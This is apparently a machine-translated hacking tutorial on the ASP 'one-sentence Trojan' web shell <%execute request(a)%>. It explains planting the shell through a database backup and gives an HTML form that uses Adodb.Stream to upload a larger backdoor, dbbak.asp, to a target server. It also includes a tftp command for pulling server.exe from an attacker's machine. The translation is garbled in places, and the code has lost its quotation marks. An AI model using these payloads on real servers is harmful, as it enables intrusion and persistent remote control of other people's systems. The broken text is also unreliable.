The one-sentence Trojan is inserted into the ASP file: Of course, the one-sentence Trojan itself is the ASP file. Can be accessed using IE: Only if it can be accessed, we can submit the data. As long as it can be accessed, it can be
Access via HTTP protocol
In one sentence, the scope of use of Trojans (I only listed 2 types):
1) Only database backup is required
When the database is backed up into an asp file, no compilation error occurs, and the script close flag is missing %>
2) When setting SA permissions, you usually write a sentence first for convenience. (Of course, it is faster to upload pigeons directly via tftp and run them)
tftp -i ip get server.exe
The principle of Trojan horse <%execute request(a)%> in one sentence:
know first
The execute() function is used to execute asp code. It is responsible for executing the horse we uploaded and passing it to asp.dll for analysis. The above code <%execute request(a)%> can be explained like this:
<%
if request(a)<> then execute request(a)
%>
If a is not empty, it will be executed. What will be executed?...
if a != 0
Let's take a look at the client:
<form action=http://192.168.0.28/shell.asp method=post>
<textarea name=l cols=120 rows=10 width=45>
set lP=server.CreateObject(Adodb.Stream) 'Create Adodb.Stream component..
lP.Open
lP.Type=2
lP.CharSet=gb2312
lP.writetext request(p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Close
set lP=nothing
response.redirect dbbak.asp
</textarea>
<textarea name=p cols=120 rows=10 width=45>Data to be submitted</textarea><BR><center><br>
<input type=submit value=submit>
Adodb.Stream is responsible for uploading read data to the server:
Component: Adodb.Stream
There are following methods:
Cancel method
How to use it
Object.Cancel
Description: Cancels execution of a pending asynchronous Execute or Open method call.
WriteText method
How to use it:
Object.Write(Data,[Options])
Description: Load the specified text data into the object.
Parameter description: Data is the specified content to be written.
Options The options to write, which can be left unspecified. The optional parameters are as follows:
adWriteChar =0
adWriteLine =1
SaveToFile method
How to use it:
Object.SaveToFile(FileName,[Options])
Description: Write the contents of the object to the file specified by FileName
That is, the file name where we save the Trojan is dbbak.asp
Parameter description: File specified by FileName
Options access options, which can be left unspecified. The optional parameters are as follows:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
After submitting a sentence Trojan, the value of a is empty and waiting for a written value. Accessing http://www.***.com/**.asp is the waiting process. How to prepare for execution using the execute() function.. .
Create an Adodb.Stream, responsible for writing our data to the server...
At the same time, the variable SaveToFile defined by this component defines our Malaysian name..dbbak.asp
After submitting to the server, the execute() function detects that the value of a is not empty, so it executes our Malaysia!